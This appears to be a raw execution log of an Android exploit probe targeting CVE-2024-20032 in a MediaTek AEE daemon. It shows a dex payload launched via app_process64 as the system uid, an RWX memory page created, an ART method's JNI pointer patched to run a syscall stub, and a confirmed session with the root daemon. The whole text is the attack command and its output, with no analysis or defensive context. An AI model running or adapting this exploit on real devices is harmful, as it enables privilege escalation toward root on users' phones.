command=CLASSPATH=/data/data/com.android.settings/cache/apusys_ioctl_probe.dex app_process64 /system/bin AeeSessionProbe --socket=com.mtk.aee.aed_64 --ind=11 --class=3 --payload
probe=aee-session
dex_md5=6f6381355c6f1c8348c1d015065ae178
dex_sha256=bd253461e36ea01da86742575061e7defbc11ed987fd54a16ca49375fc59a0ee
remote_dex=/data/data/com.android.settings/cache/apusys_ioctl_probe.dex
shell_port=127.0.0.1:48888
exit_status=0

uid=1000(system) gid=1000(system) groups=1000(system),3003(inet) context=u:r:system_app:s0
u:r:system_app:s0
6f6381355c6f1c8348c1d015065ae178  /data/data/com.android.settings/cache/apusys_ioctl_probe.dex
[AeeSessionProbe] CVE-2024-20032 session driver
[AeeSessionProbe] uid=1000 pid=23623 target_pid=23623 class=3 ind=11 flags=0x0 payload=true
[+] Scratch buffer at 0x746d400000
[*] Trying anonymous PROT_RWX mmap...
[+] Anonymous RWX page at 0x746b87f000
[+] Wrote syscall stub: JNI@+0x00 (36B), call stub JNI@+0x80 (40B); entry_point left untouched
[*] ArtMethod for nativeSyscall at 0x74601eea20
    access_flags = 0x10000108 [NATIVE]
    data (JNI ptr) = 0x71ba21a2c0
    entry_point    = 0x1038000808afc368
[*] Patching data_ (JNI) → 0x746b87f000
    data_       = 0x746b87f000 ✓
    entry_point = 0x1038000808afc368 (unchanged)
[+] ArtMethod patched
[+] Syscall infrastructure ready

[session] @com.mtk.aee.aed_64 connected peer_uid=0
[session] IND ind=11 class=3 pid=23623 flags=0x0 payload=18
[session] IND bytes: 02 00 00 00 0b 00 00 00 47 5c 00 00 03 00 00 00 12 00 00 00 00 00 00 00
[session] REQ#0 type=0 cmd=2(REQ_TYPE) seq=0 payload=0
[session] REQ#1 type=0 cmd=3(REQ_PROCESS) seq=1 payload=0
[session] REQ#2 type=0 cmd=4(REQ_MODULE) seq=2 payload=0
[session] REQ#3 type=0 cmd=43(REQ_TRIG_TIME) seq=3 payload=0
[session] REQ#4 type=0 cmd=5(REQ_BACKTRACE) seq=4 payload=0
[session] read timeout after 5 reqs
[session] *** SUCCESS: 5 REQ/RSP exchanges on @com.mtk.aee.aed_64 ***
[result] CVE_2024_20032=CONFIRMED — system_app drove full session with root aee daemon
%n[phase-check] /data/vendor/aee_exp/
[aee_exp] empty
